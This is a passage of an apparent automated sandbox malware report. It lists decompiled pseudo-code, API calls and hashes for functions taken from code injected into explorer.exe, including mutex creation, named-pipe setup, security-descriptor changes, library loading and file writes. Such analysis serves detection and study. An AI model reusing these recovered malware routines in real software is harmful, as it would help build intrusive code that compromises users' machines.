									 *0x9e6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}










                  0x0008153e
                  0x00081545
                  0x0008154b
                  0x00081552
                  0x00081607
                  0x00081607
                  0x00081607
                  0x00081558
                  0x0008155b
                  0x00081561
                  0x00081568
                  0x00000000
                  0x0008156e
                  0x00081573
                  0x00081578
                  0x0008157d
                  0x00000000
                  0x00081583
                  0x0008158f
                  0x00081594
                  0x0008159e
                  0x000815a3
                  0x000815ab
                  0x000815b9
                  0x000815bf
                  0x000815c4
                  0x000815ca
                  0x000815cc
                  0x000815d2
                  0x000815d8
                  0x000815e4
                  0x000815ea
                  0x000815eb
                  0x000815f2
                  0x000815f8
                  0x000815fd
                  0x00081602
                  0x000815ce
                  0x000815ce
                  0x00000000
                  0x000815ce
                  0x000815ad
                  0x000815ad
                  0x000815af
                  0x000815af
                  0x000815af
                  0x000815ab
                  0x0008157d
                  0x00081568
                  0x0008160c

                  APIs
                  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
                  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateMutex$AllocateHeap
                  • String ID:
                  • API String ID: 704353917-0
                  • Opcode ID: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
                  • Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
                  • Opcode Fuzzy Hash: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
                  • Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008BC7A, Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                  Download Yara Rule
                  C-Code - Quality: 44%
                  			E0008BC7A(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _t18;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t38;
				char _t39;

				_t39 = 0;
				_t38 =  *0x9e674; // 0x1f8
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t18 = E000895E1(__ecx, 0x84b);
				_push(0);
				_v24 = _t18;
				_push( &_v8);
				_push(1);
				_push(_t18);
				_t19 =  *0x9e68c; // 0x40fab8, executed
				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
					_push( &_v16);
					_push( &_v12);
					_push( &_v20);
					_t27 =  *0x9e68c; // 0x40fab8
					_push(_v8);
					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
						_push(_v12);
						_t30 =  *0x9e68c; // 0x40fab8
						_push(0);
						_push(0);
						_push(0);
						_push(0x10);
						_push(6);
						_push(_t38); // executed
						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
							_t39 = 1;
						}
					}
					_t36 =  *0x9e68c; // 0x40fab8
					 *((intOrPtr*)(_t36 + 0x10))(_v8);
				}
				E000885D5( &_v24);
				return _t39;
			}















                  0x0008bc81
                  0x0008bc84
                  0x0008bc8f
                  0x0008bc92
                  0x0008bc95
                  0x0008bc98
                  0x0008bc9b
                  0x0008bca1
                  0x0008bca5
                  0x0008bca8
                  0x0008bca9
                  0x0008bcab
                  0x0008bcac
                  0x0008bcb9
                  0x0008bcbe
                  0x0008bcc2
                  0x0008bcc6
                  0x0008bcc7
                  0x0008bccc
                  0x0008bcd7
                  0x0008bcd9
                  0x0008bcdc
                  0x0008bce1
                  0x0008bce2
                  0x0008bce3
                  0x0008bce4
                  0x0008bce6
                  0x0008bce8
                  0x0008bcf1
                  0x0008bcf3
                  0x0008bcf3
                  0x0008bcf1
                  0x0008bcf4
                  0x0008bcfd
                  0x0008bcfd
                  0x0008bd04
                  0x0008bd0f

                  APIs
                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCB1
                  • SetSecurityInfo.ADVAPI32(000001F8,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Security$Descriptor$ConvertInfoString
                  • String ID:
                  • API String ID: 3187949549-0
                  • Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                  • Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
                  • Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                  • Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008E1BC, Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 47%
                  			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000895C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0008E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000885C2( &_v8);
				return _t25;
			}










                  0x0008e1bf
                  0x0008e1c2
                  0x0008e1c8
                  0x0008e1ca
                  0x0008e1cf
                  0x0008e1d1
                  0x0008e1db
                  0x0008e1dc
                  0x0008e1eb
                  0x0008e1de
                  0x0008e1de
                  0x0008e1de
                  0x0008e1ef
                  0x0008e1f6
                  0x0008e1fc
                  0x0008e1fc
                  0x0008e201
                  0x0008e20c

                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
                  • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 4133054770-0
                  • Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                  • Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
                  • Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                  • Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00082C8F, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                  Download Yara Rule
                  C-Code - Quality: 65%
                  			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E0008B700(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
				if(E0008BB8D(_t70) == 0) {
					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
						_t71 = E00082C64( &_v1084, __eflags);
					} else {
						E0008B012(_t54,  &_v564); // executed
						_t32 = E0008109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E000892E5( &_v1084);
						E000885D5( &_v12);
					}
				} else {
					_t38 = E0008109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0x9e684; // 0x40f8f0
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E0008109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E000892E5( &_v564);
						E000885D5( &_v8);
					} else {
						_t71 = E00082C64( &_v44, _t78);
					}
					E000885D5( &_v12);
				}
				_v8 = _t71;
				_t25 = E0008B269(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E0008B269(_t71) == 0) {
						E0008861A( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}























                  0x00082c9e
                  0x00082ca0
                  0x00082ca3
                  0x00082ca9
                  0x00082cb2
                  0x00082d36
                  0x00082d3b
                  0x00082d3c
                  0x00082d3e
                  0x00082d8f
                  0x00082d40
                  0x00082d46
                  0x00082d50
                  0x00082d55
                  0x00082d5a
                  0x00082d5d
                  0x00082d5e
                  0x00082d63
                  0x00082d64
                  0x00082d65
                  0x00082d6c
                  0x00082d6d
                  0x00082d7a
                  0x00082d80
                  0x00082d85
                  0x00082cb4
                  0x00082cb9
                  0x00082cbe
                  0x00082ccc
                  0x00082cd0
                  0x00082cd5
                  0x00082cdb
                  0x00082cdd
                  0x00082ced
                  0x00082cf2
                  0x00082cf7
                  0x00082cfa
                  0x00082cfb
                  0x00082d00
                  0x00082d01
                  0x00082d02
                  0x00082d0f
                  0x00082d15
                  0x00082cdf
                  0x00082ce4
                  0x00082ce4
                  0x00082d21
                  0x00082d26
                  0x00082d93
                  0x00082d96
                  0x00082d9d
                  0x00082da1
                  0x00082da9
                  0x00082dbc
                  0x00082dc1
                  0x00082dc5
                  0x00082da9
                  0x00082dca

                  APIs
                  • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateDirectory
                  • String ID:
                  • API String ID: 4241100979-0
                  • Opcode ID: 334b7fb11edf8458ac038dde38966bd3d6edb3cda6ed2f855dcb4e5129f97406
                  • Instruction ID: 661ddabdbbf5835fe1c09d22864260864737aa38d39f94c9f57271a24964c515
                  • Opcode Fuzzy Hash: 334b7fb11edf8458ac038dde38966bd3d6edb3cda6ed2f855dcb4e5129f97406
                  • Instruction Fuzzy Hash: D931A4B1914314AADB24FBA4CC51AFE77ACBF04350F040169F985E3182EF749F408BA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000831C2, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E000831C2(void* __edx, void* __eflags) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t38;
				CHAR* _t40;

				_t38 = __edx;
				_t28 =  *0x9e688; // 0xb0000
				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t40 = _t10;
				_v8 = _t40;
				if(_t40 != 0) {
					_t11 = E00088604(0x80000); // executed
					 *0x9e724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E0008BD10(); // executed
						_v16 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_push(0xc);
							_pop(0);
							_v12 = 1;
						}
						_v20 = 0;
						__eflags = 0;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0x9e674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E0008BC7A( &_v20, _t38); // executed
							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0x9e684; // 0x40f8f0
							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0x9e674 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E0008861A( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}
















                  0x000831c2
                  0x000831c8
                  0x000831d8
                  0x000831dd
                  0x000831df
                  0x000831e4
                  0x000831f5
                  0x000831fa
                  0x00083200
                  0x00083202
                  0x0008320b
                  0x00083210
                  0x00083213
                  0x00083215
                  0x00083217
                  0x00083219
                  0x0008321a
                  0x0008321a
                  0x00083227
                  0x0008322a
                  0x0008322f
                  0x00083249
                  0x0008324f
                  0x00083254
                  0x00083257
                  0x00083263
                  0x00083271
                  0x00083278
                  0x0008327a
                  0x00000000
                  0x00000000
                  0x0008327c
                  0x00083287
                  0x0008328a
                  0x00000000
                  0x00083259
                  0x00083259
                  0x0008325f
                  0x0008328c
                  0x0008328c
                  0x0008328d
                  0x00083293
                  0x00000000
                  0x0008329c
                  0x00083257
                  0x00083204
                  0x00000000
                  0x00083204
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ef1db64370f73cb2a10a24a51a86a1782430a7c5df0a70211d0b58567d7404a5
                  • Instruction ID: 8572b94192bc1e43ddf863f0276067eeaee28e73aa111561e36aea24d5a940c8
                  • Opcode Fuzzy Hash: ef1db64370f73cb2a10a24a51a86a1782430a7c5df0a70211d0b58567d7404a5
                  • Instruction Fuzzy Hash: 6821C872604211AAEB10FBB9EC45FAE77A8FB95B74F20032AF165D71D1EE3489008751
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00085AFF, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00085AFF(intOrPtr __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t22;
				intOrPtr _t23;
				signed int _t30;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				signed int _t47;
				void* _t55;

				_t55 = __fp0;
				_t45 = __edx;
				_t47 = 0;
				_t22 = E00088604(0x14);
				_t38 =  *0x9e688; // 0xb0000
				_t46 = _t22;
				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t38 + 0x228));
					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t46 = 2;
				 *(_t46 + 4) = _t47;
				_t23 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
				if(_t40 == 0) {
					L9:
					if(E00082DCB() == 0) {
						goto L11;
					} else {
						_t47 = _t47 | 0xffffffff;
					}
				} else {
					_t45 =  *_t40;
					_t30 = _t47;
					if(_t45 == 0) {
						goto L9;
					} else {
						_t44 =  *((intOrPtr*)(_t40 + 4));
						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
							_t30 = _t30 + 1;
							if(_t30 < _t45) {
								continue;
							} else {
								goto L9;
							}
							goto L12;
						}
						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
							L11:
							E00084D6D(_t46, _t45, _t55);
						} else {
							goto L9;
						}
					}
				}
				L12:
				E0008A39E();
				E0008A39E();
				return _t47;
			}

















                  0x00085aff
                  0x00085aff
                  0x00085b0a
                  0x00085b0c
                  0x00085b12
                  0x00085b18
                  0x00085b22
                  0x00085b2b
                  0x00085b36
                  0x00085b41
                  0x00085b47
                  0x00085b4f
                  0x00085b4f
                  0x00085b55
                  0x00085b5b
                  0x00085b5e
                  0x00085b69
                  0x00085b71
                  0x00085b73
                  0x00085b78
                  0x00085b98
                  0x00085b9f
                  0x00000000
                  0x00085ba1
                  0x00085ba1
                  0x00085ba1
                  0x00085b7a
                  0x00085b7a
                  0x00085b7c
                  0x00085b80
                  0x00000000
                  0x00085b82
                  0x00085b82
                  0x00085b85
                  0x00085b8b
                  0x00085b8e
                  0x00000000
                  0x00085b90
                  0x00000000
                  0x00085b90
                  0x00000000
                  0x00085b8e
                  0x00085b96
                  0x00085ba6
                  0x00085ba8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00085b96
                  0x00085b80
                  0x00085bad
                  0x00085bb0
                  0x00085bb8
                  0x00085bc3

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetDriveTypeW.KERNELBASE(?), ref: 00085B4F
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateDriveHeapType
                  • String ID:
                  • API String ID: 414167704-0
                  • Opcode ID: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
                  • Instruction ID: 556f522260d7e6bdf941df906934654c795a6f01da19a51ea332bd0742bdc193
                  • Opcode Fuzzy Hash: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
                  • Instruction Fuzzy Hash: C4213638600B169BC714BFA4DC489ADB7B0FF58325B24813EE49587392FB32C842CB85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008E450, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                  Download Yara Rule
                  C-Code - Quality: 71%
                  			E0008E450(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0x9e6b0; // 0x12d0468
				if( *_t5 == 0) {
					_v8 = E000895C7(0x2a7);
					 *0x9e788 = E000891A6(_t6, 0);
					E000885C2( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E00088604(0x101);
					 *0x9e788 = _t10;
					_t11 =  *0x9e6b0; // 0x12d0468
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
					}
				}
			}








                  0x0008e453
                  0x0008e454
                  0x0008e45c
                  0x0008e4a6
                  0x0008e4b3
                  0x0008e4b8
                  0x00000000
                  0x0008e45e
                  0x0008e463
                  0x0008e46a
                  0x0008e473
                  0x0008e47a
                  0x0008e481
                  0x0008e485
                  0x0008e4bd
                  0x0008e4c0
                  0x0008e487
                  0x0008e499
                  0x0008e499
                  0x0008e485

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Heap$AgentAllocateFreeObtainStringUser
                  • String ID:
                  • API String ID: 471734292-0
                  • Opcode ID: e1b1cfbf227747cf64feb4deb7d262467d815f04f794748821e1b714f717f6a7
                  • Instruction ID: f91671ab82a028632dec16c50dcaaaafc6d594eba443ed6fbe21b10f95aa2484
                  • Opcode Fuzzy Hash: e1b1cfbf227747cf64feb4deb7d262467d815f04f794748821e1b714f717f6a7
                  • Instruction Fuzzy Hash: 76F0CD30608240EBFB84FBB4DC4AAA977E0BB10324F644259F056D32D2EEB49D009715
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A65C, Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}









                  0x0008a65c
                  0x0008a65f
                  0x0008a660
                  0x0008a663
                  0x0008a665
                  0x0008a668
                  0x0008a66d
                  0x0008a69e
                  0x0008a6a0
                  0x0008a66f
                  0x0008a66f
                  0x0008a66f
                  0x0008a691
                  0x00000000
                  0x00000000
                  0x0008a693
                  0x0008a696
                  0x0008a69c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008a69c
                  0x0008a6a5
                  0x0008a6a5
                  0x0008a6a1
                  0x0008a6a4

                  APIs
                  • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  • Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                  • Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
                  • Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                  • Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A5F7, Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0008A5F7(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x9e684; // 0x40f8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}






                  0x0008a601
                  0x0008a615
                  0x0008a61a
                  0x0008a623
                  0x0008a625
                  0x0008a62f
                  0x0008a62f
                  0x00000000
                  0x0008a635
                  0x00000000

                  APIs
                  • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                  • Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
                  • Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                  • Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00083017, Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00083017() {
				signed int _t4;
				intOrPtr _t8;
				void* _t11;

				_t4 =  *0x9e688; // 0xb0000
				if( *((intOrPtr*)(_t4 + 0x214)) != 3) {
					L3:
					return _t4 | 0xffffffff;
				} else {
					_t4 = E0008BB20(_t11);
					if(_t4 != 0) {
						goto L3;
					} else {
						AllocConsole();
						_t8 =  *0x9e684; // 0x40f8f0
						 *((intOrPtr*)(_t8 + 0x118))(E00082FF7, 1);
						return 0;
					}
				}
			}






                  0x00083017
                  0x00083023
                  0x0008304e
                  0x00083051
                  0x00083025
                  0x00083025
                  0x0008302c
                  0x00000000
                  0x0008302e
                  0x00083033
                  0x00083039
                  0x00083045
                  0x0008304d
                  0x0008304d
                  0x0008302c

                  APIs
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocConsole
                  • String ID:
                  • API String ID: 4167703944-0
                  • Opcode ID: 98fbbdecb1ae9542cf8ec98e6f71def4586e7244e81903211f4d867ad5e511a6
                  • Instruction ID: ec183062af37bb11ca52ab854039e277753fe4296209864586c1fc79c77fff40
                  • Opcode Fuzzy Hash: 98fbbdecb1ae9542cf8ec98e6f71def4586e7244e81903211f4d867ad5e511a6
                  • Instruction Fuzzy Hash: 91E017312101059BEA10FB34CE4AAE432E0BF64B65F8601B0F254CA0A2DBB88D80CB12
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A63B, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0008A63B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}




                  0x0008a64f
                  0x0008a652
                  0x0008a657
                  0x0008a65b

                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                  • Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
                  • Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                  • Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00088604, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00088604(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
				return _t2;
			}




                  0x00088612
                  0x00088619

                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
